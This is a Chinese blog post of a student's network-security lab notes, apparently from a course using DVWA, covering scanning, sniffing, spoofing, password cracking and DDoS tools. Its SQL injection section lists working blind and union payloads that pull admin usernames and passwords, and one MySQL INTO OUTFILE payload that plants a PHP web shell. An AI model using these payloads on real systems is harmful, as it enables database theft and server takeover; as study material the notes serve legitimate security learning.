<!DOCTYPE html>
<html lang="zh-Hans">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="Jason_xi">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Jason_xi">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="一步一个脚印">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>网络安全实验 · Supersnail&#39;s advance</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/boy.jpg" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >SuperSnail&#39;s Advance</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">网络安全实验</a>
            </div>
    </div>
    
    <a class="home-link" href=/>SuperSnail's Advance</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            网络安全实验
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">2,764</span>阅读时长: <span class="post-count reading-time">12 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/11/07</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <p>Linux 快捷键：<br>终端:<br>复制命令：Ctrl + Shift + C  组合键    .    </p>
<p>粘贴命令：Ctrl + Shift + V  组合键           </p>
<p>控制台：<br>复制命令：Ctrl + Insert  组合键　　或　　用鼠标选中即是复制。         </p>
<p>粘贴命令：Shift + Insert  组合键　　或　　单击鼠标滚轮即为粘贴。                 </p>
<h1 id="server-u"><a href="#server-u" class="headerlink" title="server-u"></a>server-u</h1><p>Nessus扫描主机。<br>serv-u目录遍历漏洞<br>CMD中输入:<br>ftp ip;<br>ftp； 匿名登陆<br>ls 查看目录，<br>get ../ftp/1.txt获取1.txt文件   </p>
<p>503 服务器出错<br>404 网页程序出错   </p>
<h1 id="主机存活性"><a href="#主机存活性" class="headerlink" title="主机存活性"></a>主机存活性</h1><p>ping 发送四次ICMP报文得到回显。<br>ping 探测网段内存活主机。各种命令使用   </p>
<p>Nmap superScan工具判断主机存活性<br><code>nmap -sn 172.17.135.6-172.17.135.122</code>  空扫描    </p>
<p>Fping发现网段内存活主机探测。<br><code>fping –a –g 172.17.135.6 172.17.135.122</code> -a 响应目标 -g 起始地址和终止地址    </p>
<h1 id="主机信息探测"><a href="#主机信息探测" class="headerlink" title="主机信息探测"></a>主机信息探测</h1><p>X-scan探测主机敏感信息<br>MBSA探测主机一些安全配置。   </p>
<h1 id="端口服务探测"><a href="#端口服务探测" class="headerlink" title="端口服务探测"></a>端口服务探测</h1><p>公认端口；HTTP协议80端口<br>注册端口；<br>动态/私有端口；</p>
<p>netstat -a -n -o<br>-a 所有socket -n 网路地址代替名称+状态  -o 加上进程PID显示    </p>
<p>ftp ip 测试21端口ftp服务<br>telnet ip 测试23端口telnet服务<br>mstsc /v ip 测试3389端口可远程连接   </p>
<p>ScanPort扫描<br>SuperScan扫描<br>nmap扫描 nmap -T4 -A -v ip    </p>
<h1 id="Wireshark抓包实验"><a href="#Wireshark抓包实验" class="headerlink" title="Wireshark抓包实验"></a>Wireshark抓包实验</h1><p>捕捉TCP包分析<br>捕捉PING命令发送的ICMP包一个request+一个reply;   </p>
<h1 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h1><p>RST比特用来复位，TCP连接三种情况：<br>1.不存在连接端口请求<br>2.异常终止一个链接。<br>3.检测半关闭连接  </p>
<p>1.全TCP连接 connect()，<br>2.SYN半打开，（应答包含SYN和ACK，端口打开）<br>3.FIN秘密（应答RST端口关闭，否则丢包端口开启)变种 X-mas和Null  （打开和关闭标记）适用Unix主机<br>5.UDP ICMP （Windows适用 ）    </p>
<p>命令总结：<br>-sT：扫描TCP数据包以建立的连接connect()</p>
<p>-sS：扫描TCP数据包带有SYN数据的标记（发送SYN,收到SYN|ACK，发送RST代替ACK，连接终止，三次握手未实现。）</p>
<p>-sP：以ping方式进行扫描</p>
<p>-sU：以UDP数据包格式进行扫描</p>
<p>-sF,-sX,-sN：以Fin,Xmas,Null方式扫描      </p>
<h1 id="Sniffer嗅探使用"><a href="#Sniffer嗅探使用" class="headerlink" title="Sniffer嗅探使用"></a>Sniffer嗅探使用</h1><p>捕获局域网之间的信息传输。<br>例如捕获FTP包和HTTP包。<br>Matrix — Capture— Decode.</p>
<h1 id="Linux路由信息探测"><a href="#Linux路由信息探测" class="headerlink" title="Linux路由信息探测"></a>Linux路由信息探测</h1><p>info traceroute查看路由信息<br>mii-tool查看当前网络<br>ifconfig eth0 ip netmask 子网掩码 up<br>route add default gw 网关<br>ifconfig查看配置信息<br>traceroute 域名</p>
<h1 id="域名信息探测"><a href="#域名信息探测" class="headerlink" title="域名信息探测"></a>域名信息探测</h1><p>nslookup； 查询DNS记录；查看域名解析是否正常；<br>set type=any 所有类型记录；</p>
<p>10.路由信息探测</p>
<h1 id="主机信息探测实验"><a href="#主机信息探测实验" class="headerlink" title="主机信息探测实验"></a>主机信息探测实验</h1><p>X-scan<br>MBSA</p>
<p>12.交换式网络嗅探<br>集线器共享式网络<br>交换机交换式网络</p>
<h1 id="操作系统指纹探测"><a href="#操作系统指纹探测" class="headerlink" title="操作系统指纹探测"></a>操作系统指纹探测</h1><p>ping TTL=128Windows TTL=235左右 Unix家族</p>
<h1 id="指针"><a href="#指针" class="headerlink" title="指针"></a>指针</h1><p>EIP 指令指针<br>EBP 栈底指针<br>ESP 栈顶指针</p>
<h1 id="scanport"><a href="#scanport" class="headerlink" title="scanport"></a>scanport</h1><p>扫描端口</p>
<h1 id="Stinger病毒查杀"><a href="#Stinger病毒查杀" class="headerlink" title="Stinger病毒查杀"></a>Stinger病毒查杀</h1><h1 id="Jsky扫描网站漏洞"><a href="#Jsky扫描网站漏洞" class="headerlink" title="Jsky扫描网站漏洞"></a>Jsky扫描网站漏洞</h1><h1 id="IISwrite漏洞利用"><a href="#IISwrite漏洞利用" class="headerlink" title="IISwrite漏洞利用"></a>IISwrite漏洞利用</h1><p>WebDAV扩展的HTTP请求实现的文件存储服务，用类似HTTP请求方式上传下载同步文件。应用程序可对Web Server直接读写。</p>
<p>IIS scanner可利用漏洞上传文件留后门</p>
<h1 id="APPSCAN扫描WEB漏洞"><a href="#APPSCAN扫描WEB漏洞" class="headerlink" title="APPSCAN扫描WEB漏洞"></a>APPSCAN扫描WEB漏洞</h1><h1 id="owasp-zap扫描网站漏洞"><a href="#owasp-zap扫描网站漏洞" class="headerlink" title="owasp zap扫描网站漏洞"></a>owasp zap扫描网站漏洞</h1><p>可扫描端口，扫描漏洞，爬取站点。</p>
<h1 id="WebCruiser扫描网站漏洞"><a href="#WebCruiser扫描网站漏洞" class="headerlink" title="WebCruiser扫描网站漏洞"></a>WebCruiser扫描网站漏洞</h1><h1 id="WSCAN扫描网站后台"><a href="#WSCAN扫描网站后台" class="headerlink" title="WSCAN扫描网站后台"></a>WSCAN扫描网站后台</h1><p>（啊D和名小子）</p>
<h1 id="路由信息探测"><a href="#路由信息探测" class="headerlink" title="路由信息探测"></a>路由信息探测</h1><p>ping -r <a href="http://www.baidu.com记录中间路由（类型为8数据报，每转发一次，IP地址写入一次，-1）" target="_blank" rel="noopener">www.baidu.com记录中间路由（类型为8数据报，每转发一次，IP地址写入一次，-1）</a><br>UDP协议路由探测：路由转发TTL-1，为0时ICMP超时确定路由<br>ICMP ECHO Request路由探测:发送端TTL+1，中转路由TTL-1</p>
<h1 id="安全漏洞探测"><a href="#安全漏洞探测" class="headerlink" title="安全漏洞探测"></a>安全漏洞探测</h1><p>Fluxay漏洞扫描<br>Nessus漏洞扫描</p>
<hr>
<h1 id="Linux系统密码破解"><a href="#Linux系统密码破解" class="headerlink" title="Linux系统密码破解"></a>Linux系统密码破解</h1><p>/etc/passwd文件 有UID信息，为0具有root权限<br>加密口令在 /etc/shadow文件 root权限<br>/etc/group,GID被映射到用户分组名称</p>
<h1 id="Linux密码修改"><a href="#Linux密码修改" class="headerlink" title="Linux密码修改"></a>Linux密码修改</h1><p>Centos<br>任意键进入grub引导–Centos(e编辑)–kernel(e)—输入single保存进入单用户—菜单按b进入—cat /etc/passwd查看账户信息—最后一个为常用登陆用户名。 passwd root修改密码—-useradd Jason;password Jason(新建用户)—-reboot</p>
<h1 id="Windows密码破解"><a href="#Windows密码破解" class="headerlink" title="Windows密码破解"></a>Windows密码破解</h1><p>NTLM算法</p>
<p>LM算法</p>
<p>Windows密码文件SAM文件存放c:\Windows\System32\config<br>无法复制破解，可嗅探Hash值，利用pwdump,SamInside工具进行爆破。包括暴力破解、字典攻击、彩虹表攻击，暴力破解。</p>
<h1 id="Md5破解"><a href="#Md5破解" class="headerlink" title="Md5破解"></a>Md5破解</h1><p>Md5Crack或在线破解</p>
<h1 id="压缩文件解密"><a href="#压缩文件解密" class="headerlink" title="压缩文件解密"></a>压缩文件解密</h1><p>AES算法</p>
<p>加密过程<br>（1）：先把源文件压缩，压成一段数据段。<br>（2）：再将压缩完的数据段加密。<br>加密流程<br>（1）获取密钥<br>（2）以Key和initVector来加密压缩数据：</p>
<p>解密的过程是解密后的数据块进行解压缩，然后解成源文件，对该文件进行CRC校验，存在RAR文件中的源文件CRC校验码比较，相同则密码正确，不相同则密码错误。</p>
<p>解密工具:ARPR</p>
<h1 id="OFFICE文件密码破解"><a href="#OFFICE文件密码破解" class="headerlink" title="OFFICE文件密码破解"></a>OFFICE文件密码破解</h1><p>hash函数（单向不可逆）<br>RC4流加密算法，对称体制加密。<br>加密过程：产生一个salt,口令+salt计算hash;</p>
<p>aoprsetup工具进行破解；<br>SingK可生成字典</p>
<h1 id="Access密码破解"><a href="#Access密码破解" class="headerlink" title="Access密码破解"></a>Access密码破解</h1><p>1.soft_vap<br>2.Cain<br>3.aopr</p>
<h1 id="Windows修改密码"><a href="#Windows修改密码" class="headerlink" title="Windows修改密码"></a>Windows修改密码</h1><p>SAM存储登录名及口令信息<br>L0pthCrack可破解系统用户密码<br>Aoxppr.exe可破解word等密码</p>
<h1 id="Windows密码破解-1"><a href="#Windows密码破解-1" class="headerlink" title="Windows密码破解"></a>Windows密码破解</h1><p>Pwdump7破解SAM信息<br>SAMInside进行解密获取密码</p>
<hr>
<p><strong>欺骗技术</strong></p>
<h1 id="ARP欺骗"><a href="#ARP欺骗" class="headerlink" title="ARP欺骗"></a>ARP欺骗</h1><p>1.中间人攻击<br>A攻击者 S源主机 D目的主机<br>D的IP与A的MAC/S的IP与A的MAC，形成中继<br>2.拒绝服务<br>ARP表中MAC地址改为不存在的 ，先修改MAC地址，无服务，然后克隆目标主机IP与MAC地址。</p>
<hr>
<h1 id="IP欺骗："><a href="#IP欺骗：" class="headerlink" title="IP欺骗："></a>IP欺骗：</h1><p>1.随意伪造IP，主要DDOS，<br>2.伪造被攻击者信任IP冒充；</p>
<p>IPSpoof:TCP及IP欺骗（Mendax,Hunt,Dsniff,ISNPrint）</p>
<h1 id="MAC欺骗"><a href="#MAC欺骗" class="headerlink" title="MAC欺骗"></a>MAC欺骗</h1><p>IP-MAC-PORT 利用MAC和PORT对应关系</p>
<p>MacMakeUp伪造源MAC地址的MAC欺骗。</p>
<h1 id="ARP-DNS欺骗"><a href="#ARP-DNS欺骗" class="headerlink" title="ARP_DNS欺骗"></a>ARP_DNS欺骗</h1><p>ARP是局域网，DNS是internet攻击；<br>ARP:路由器ARP表欺骗，内网PC网关欺骗。</p>
<h2 id="未完"><a href="#未完" class="headerlink" title="未完"></a>未完</h2><h1 id="Web攻击技术"><a href="#Web攻击技术" class="headerlink" title="Web攻击技术"></a>Web攻击技术</h1><p>SQL运算符优先级<br>:=</p>
<p>||, OR, XOR</p>
<p>&amp;&amp;, AND</p>
<p>NOT</p>
<p>BETWEEN, CASE, WHEN, THEN, ELSE</p>
<p>=, &lt;=&gt;, &gt;=, &gt;, &lt;=, &lt;, &lt;&gt;, !=, IS, LIKE, REGEXP, IN</p>
<p>|</p>
<p>&amp;</p>
<p>&lt;, &gt;&gt;</p>
<p>-, +</p>
<p>*, /, DIV, %, MOD</p>
<p>^</p>
<ul>
<li>(一元减号), ~ (一元比特反转)</li>
</ul>
<p>!</p>
<p>BINARY, COLLATE</p>
<h1 id="Mysql注释"><a href="#Mysql注释" class="headerlink" title="Mysql注释"></a>Mysql注释</h1><p>–/# 为注释</p>
<p>ascii(substr(string,start,length))&gt;113;(r为113)</p>
<h1 id="XSS漏洞"><a href="#XSS漏洞" class="headerlink" title="XSS漏洞"></a>XSS漏洞</h1><p>1.本地利用2.反射3.存储<br>trim（）移除字串字头或字尾，删除字符串首尾空白；<br>stripslashes()函数由addslashes()函数添加的反斜杠；<br>mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符；<br>mysql_query() 函数执行一条 MySQL 查询。</p>
<h1 id="Uploads"><a href="#Uploads" class="headerlink" title="Uploads"></a>Uploads</h1><p>int strrpos ( string $haystack , string $needle [, int $offset = 0 ] )<br> 返回字符串 haystack 中 needle 最后一次出现的数字位置</p>
<p> substr ( string $string , int $start [, int $length ] )<br>返回字符串 string 由 start 和 length 参数指定的子字符串。</p>
<h1 id="远程命令"><a href="#远程命令" class="headerlink" title="远程命令"></a>远程命令</h1><p>Telnet（选项）（参数）  Linux远程登陆主机</p>
<p>mstsc Windows远程连接</p>
<h1 id="盲注流程"><a href="#盲注流程" class="headerlink" title="盲注流程"></a>盲注流程</h1><p>and 1=1 and 1=2<br>‘ and ‘1’=’1’ and ‘1’=’2<br>%’ and 1=1 and ‘%’=’%  / %’ and 1=2 and ‘%’=’%</p>
<p>IIS报错使用<br>and user&gt;0 判断ACCESS或MYSQL</p>
<p>不报错使用</p>
<pre><code>and (select count(*) from msysobjects)&gt;0 （返回权限不足access数据库）
and (select count(*) from sysobjects)&gt;0 （返回正常则为MSSQL数据库）
and db_name（）&gt;0 (返回数据库名)
and 0&lt;&gt;(select @@version)-- (判断版本信息)

and db_name（）&gt;0 （返回数据库名）
</code></pre><h2 id="ACCESS注入"><a href="#ACCESS注入" class="headerlink" title="ACCESS注入"></a>ACCESS注入</h2><p>1.猜表 2.猜字段 3.猜用户名和密码长度</p>
<pre><code>and exists (select * from [admin])
and (Select Count(*) from Admin)&gt;0

and (Select username from Admin)&gt;0    
and exists(select username from admin)&gt;0

and (select top 1 len(username) from Admin)&gt;0
and (select top 1 len(password) from Admin)&gt;0

and (select top 1 asc(mid(username,1,1)) from admin)&gt;0...
</code></pre><p>猜用户 1，换成2….继续。</p>
<h2 id="SQLSERVER注入"><a href="#SQLSERVER注入" class="headerlink" title="SQLSERVER注入"></a>SQLSERVER注入</h2><p>每一个数据库都会有用户表和系统表，在系统表sysobjects中。<br>name （数据表的名字），xtype（数据表的类型 u为用户表），id（ 数据表的对象标志）。</p>
<h3 id="猜表"><a href="#猜表" class="headerlink" title="猜表"></a>猜表</h3><pre><code>and (select top 1 name from sysobjects where xtype=&apos;u&apos;)&gt;0 (得到第一个表名:比如user)

and (select top 1 name from sysobjects where xtype=&apos;u&apos; and name not in (&apos;user&apos;))&gt;0 
</code></pre><h3 id="猜列"><a href="#猜列" class="headerlink" title="猜列"></a>猜列</h3><pre><code>and (select top 1 col_name(object_id(&apos;admin&apos;),1) from sysobjects)&gt;0
</code></pre><h3 id="猜字段"><a href="#猜字段" class="headerlink" title="猜字段"></a>猜字段</h3><pre><code>and (select top 1 username from [admin])&gt;0 【直接得到用户名】
and (select top 1 password from [admin])&gt;0 【直接得到密码】

and 1=(select count(*) from admin where len(username)&gt;0)

select name,password,id from user union select user,pwd,uid from 表名

and 1=1 union select 1,2,3,4,5... from 表名
</code></pre><h4 id="ASCII逐字解码"><a href="#ASCII逐字解码" class="headerlink" title="ASCII逐字解码"></a>ASCII逐字解码</h4><p>1.猜列长度</p>
<pre><code>and (select top 1 len(列名)from 表名)&gt;N
select top 1 len(列名) from 表名 where 列名 not in (select top 1 列名 from 表名)
</code></pre><p>2.猜用户和密码</p>
<pre><code>and (select top 1 asc(mid(字段,1,1)) from 数据库名)&gt;ASCII码
</code></pre><p>可用 betweent…..and….</p>
<p>负数加abs()</p>
<p>3.应用</p>
<pre><code>and (select count(*) from admin)&lt;&gt;0        //表
and (select count(列名) from 表名)&lt;&gt;0    //列
and (select count(*) from 表名)&gt;1,2.. //用户个数
and (select len(列名) from 表名)&gt;=1、&gt;=2、&gt;=3、&gt;=4 //用户长度
and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)&lt;&gt;0 //用户名
列名换password猜密码
</code></pre><p>4.类型详解<br>user,db_name()&gt;0  判断SQL_SERVER,<br>ACCESS系统表：msysobjects  SQL系统表： sysobjects</p>
<p>5.联合查询</p>
<pre><code>And 1=2 union select 1,2,3,4 数字有时换null;
Order by 10#
And 1=2 union select 1,2,3,4,username,5,6,7 from admin    PHP注入换

And 1=2+union+select+1,2,3,4,concat(username),5,6,7+from+admin
换
And 1=2/**/union/**/select/**/1,2,3,4,concat(username),5,6,7/**/from/**/admin/* 
and+1=2+union+select+1,username,3,password,5,6,7,8,9,10+from+users+where+id=2 //取第二个管理员信息
</code></pre><p>6.非联合查询</p>
<pre><code>and 1=(select count(*) from admin where len(username)=5)
and (select top 1 asc(mid(username,1,1)) from Admin)&gt;0
</code></pre><p>中文处理：<br>ACCESS 中文ascii负数取abs(),SQLServer 中文Unicode编码，用unicode(),nchar取中文字符</p>
<pre><code>and (select top 1 unicode(substring(usernmae,1,1)) from manage)&gt;1.....
</code></pre><p>SQLSERVER注释 –<br>MYSQL 注释 #</p>
<h3 id="MYSQL应用"><a href="#MYSQL应用" class="headerlink" title="MYSQL应用"></a>MYSQL应用</h3><p>字符型注入<br>    1’ and (select count(*) from tablenames)&gt;0;#<br>    a’ or database() like ‘%k%’ ;#<br>    a’ union select table_schema,table_name from information_schema.tables where table_schema like ‘%dv%’<br>    a’ union selcect table_schema,table_name from information_schema.tables;# //table_schema数据库名，table_name 表名<br>union 默认会去掉重复记录值再合并成结果集，如果需要保留重复的记录值，请使用 union all</p>
<pre><code>&apos; union select &apos;&apos;,&apos;&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&apos; into outfile &apos;D:\\Program Files\\Apache Software Foundation\\Apache2.2\\htdocs\\dvwa\\shell.php&apos;;#
</code></pre><p>留后门</p>
<p>（magic_quotes_gpc=On时。提交的变量中所有的’ (单引号), “ (双引号), \ (反斜线)和空字符会自动转为含有反斜线的转义字符。）</p>
<h1 id="记录变量"><a href="#记录变量" class="headerlink" title="记录变量"></a>记录变量</h1><p>varchar(n):变长型字符数据类型<br>nvarchar(n):可变长度 Unicode 数据<br>char类型： 固定长度，</p>
<p>截取字符串：<br>mid(column_name,start,[,length]);<br>substring(string,start,length);<br>left(string,n）/n为长度</p>
<h1 id="DNS域名解析"><a href="#DNS域名解析" class="headerlink" title="DNS域名解析"></a>DNS域名解析</h1><p>53端口<br>C:\Windows\System32\Drivers\etc\hosts，<br>解析先查找本地HOSTS文件<br>清除缓存命令 ipconfig/flushdns</p>
<h1 id="DDOS攻击"><a href="#DDOS攻击" class="headerlink" title="DDOS攻击"></a>DDOS攻击</h1><h2 id="DOS"><a href="#DOS" class="headerlink" title="DOS"></a>DOS</h2><p>拒绝服务：<br>TearDrop、Land、Jolt、IGMP Nuker、Boink、Smurf、Bonk       </p>
<h2 id="DDOS"><a href="#DDOS" class="headerlink" title="DDOS"></a>DDOS</h2><p>DDOS 分布式拒绝服务，洪水式攻击：<br>SYN Flood、ACK Flood、UDP Flood、ICMP Flood、TCP Flood、  Connections Flood、Script Flood、Proxy Flood      </p>
<h2 id="SYN"><a href="#SYN" class="headerlink" title="SYN"></a>SYN</h2><p>SYNDemo工具</p>
<h2 id="UDP洪水攻击"><a href="#UDP洪水攻击" class="headerlink" title="UDP洪水攻击"></a>UDP洪水攻击</h2><p>udpflood工具</p>
<h2 id="ICMP"><a href="#ICMP" class="headerlink" title="ICMP"></a>ICMP</h2><p>狂怒之ping工具</p>
<h2 id=""><a href="#" class="headerlink" title=" "></a> </h2>
    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="http://yoursite.com">Jason_xi</a>
            <p>原文链接：<a href="http://yoursite.com/2018/11/07/Net security/">http://yoursite.com/2018/11/07/Net security/</a>
            <p>发表日期：<a href="http://yoursite.com/2018/11/07/Net security/">November 7th 2018, 12:00:00 am</a>
            <p>更新日期：<a href="http://yoursite.com/2018/11/07/Net security/">December 23rd 2018, 12:24:06 pm</a>
            <p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
